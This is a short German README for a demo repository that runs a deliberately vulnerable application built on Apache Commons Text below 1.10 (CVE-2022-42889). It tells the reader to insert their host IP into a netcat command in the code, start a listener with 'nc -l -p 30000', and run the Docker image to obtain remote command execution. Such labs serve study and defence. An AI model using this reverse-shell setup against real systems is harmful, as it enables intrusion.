
Dieses Repository enthält eine einfache Anwendung, die Apache Commons Text < 1.10 verwendet und für CVE-2022-42889 anfällig ist.
Ersetzen Sie den nc-Befehl in DemoApplication.java durch Ihre Host-IP-Adresse.
Lauschen mit netcat:
$ nc -l -p 30000
Docker-Image für verwundbaren Code erstellen und ausführen:
docker build . -t vulnerable-app
docker run vulnerable-app
Wie Sie sehen, kann netcat dann entfernte Befehle ausführen.